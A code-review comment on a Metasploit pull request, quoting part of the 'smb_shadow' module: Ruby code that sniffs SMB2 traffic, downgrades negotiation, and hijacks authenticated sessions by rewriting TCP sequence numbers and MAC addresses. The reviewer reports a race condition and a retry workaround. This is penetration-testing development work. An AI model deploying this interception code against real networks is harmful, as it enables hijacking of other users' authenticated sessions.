modules/exploits/windows/smb/smb_shadow.rb

```diff
@@ -0,0 +1,649 @@
+        results[iface.name] = [] unless results[iface.name]
+        results[iface.name] << iface.addr.ip_address
+      end
+    end
+    return results
+  end
+
+  # This is the main capture thread that handles all SMB packets routed through this module.
+  def main_capture
+    # This makes sense in the context of the paper.
+    # Please read: https://strontium.io/blog/introducing-windows-10-smb-shadow-attack
+    mc = PacketFu::Capture.new(iface: @interface, promisc: true)
+    mc.capture
+    mc.stream.setfilter("ether dst #{@mac} and not ether src #{@mac} and dst port 445 and tcp[tcpflags] & (tcp-syn) == 0 and tcp[tcpflags] & (tcp-ack) != 0 and tcp[((tcp[12] >> 4) * 4) + 4 : 4] = 0xfe534d42")
+    mc.stream.each_data do |data|
+      packet = PacketFu::Packet.parse(data)
+      nss = packet.payload[0..3]
+      smb2 = packet.payload[4..-1]
+      # Only Parse Packets from known sessions
+      if @sessions[packet.tcp_header.tcp_src] && @sessions[packet.tcp_header.tcp_src][:active] && (smb2[0..4] != "\xFFSMB")
+        # Negotiate Protocol Request
+        if (smb2[11..12] == "\x00\x00")
+          smb_packet = RubySMB::SMB2::Packet::NegotiateRequest.read(smb2)
+          # Dialect Count Set To 1
+          smb_packet.dialect_count = 1
+          smb_packet.dialects = [smb_packet.dialects.first]
+          smb_packet.negotiate_context_list = []
+          smb_packet.client_start_time = 0
+          # Re-Calculate Length: (Optional...)
+          #nss = [smb_packet.to_binary_s.size].pack("L>")
+          packet.payload = "#{nss}#{smb_packet.to_binary_s}"
+        # Session Setup Request, NTLMSSP_AUTH
+        elsif smb2[11..12] == "\x00\x01"
+          smb_packet = RubySMB::SMB2::Packet::SessionSetupRequest.read(smb2)
+          if smb_packet.smb2_header.session_id != 0
+            # Disable Session
+            @sessions[packet.tcp_header.tcp_src][:active] = false
+            @sessions[packet.tcp_header.tcp_src][:acknum] += packet.tcp_header.tcp_ack - @sessions[packet.tcp_header.tcp_src][:acknum]
+            @sessions[packet.tcp_header.tcp_src][:seqnum] += packet.tcp_header.tcp_seq - @sessions[packet.tcp_header.tcp_src][:seqnum]
+            # Start Main Thread
+            @main_threads << Thread.new { main_thread(packet) }
+          end
+        end
+      end
+      if @sessions[packet.tcp_header.tcp_src] && @sessions[packet.tcp_header.tcp_src][:active]
+        @sessions[packet.tcp_header.tcp_src][:acknum] += packet.tcp_header.tcp_ack - @sessions[packet.tcp_header.tcp_src][:acknum]
+        @sessions[packet.tcp_header.tcp_src][:seqnum] += packet.tcp_header.tcp_seq - @sessions[packet.tcp_header.tcp_src][:seqnum]
+        packet.tcp_header.tcp_ack = @sessions[packet.tcp_header.tcp_src][:acknum]
+        packet.tcp_header.tcp_seq = @sessions[packet.tcp_header.tcp_src][:seqnum]
+        packet.eth_header.eth_src = str2mac(@mac)
+        packet.eth_header.eth_dst = str2mac(@sessions[packet.tcp_header.tcp_src][:dstmac])
```

Comment:
During testing, this statement failed due to `@sessions[packet.tcp_header.tcp_src][:dstmac]` being `nil`. In my understanding, this variable is set in separate thread in `start_syn_capture`. I think there is a race condition issue here, confirming what @adfoster-r7 said in this [comment](https://github.com/rapid7/metasploit-framework/pull/15903/files?authenticity_token=3xtKVY3FDLH5%2F8ll1LY8WkI6UbKrFdjA0gQIsIZtbdJmRtxiBeQvpDqzri235yVxqJLVrNbzTrgxZdsJwdlI8g%3D%3D&file-filters%5B%5D=.rb#r761178095). I could fix the issue by adding a retry in a rescue block. Note that it is not a solution and proper synchronisation (mutex) should be put in place instead:
```ruby
begin
  packet.eth_header.eth_dst = str2mac(@sessions[packet.tcp_header.tcp_src][:dstmac])
rescue => e
  sleep 0.1
  retry
end
```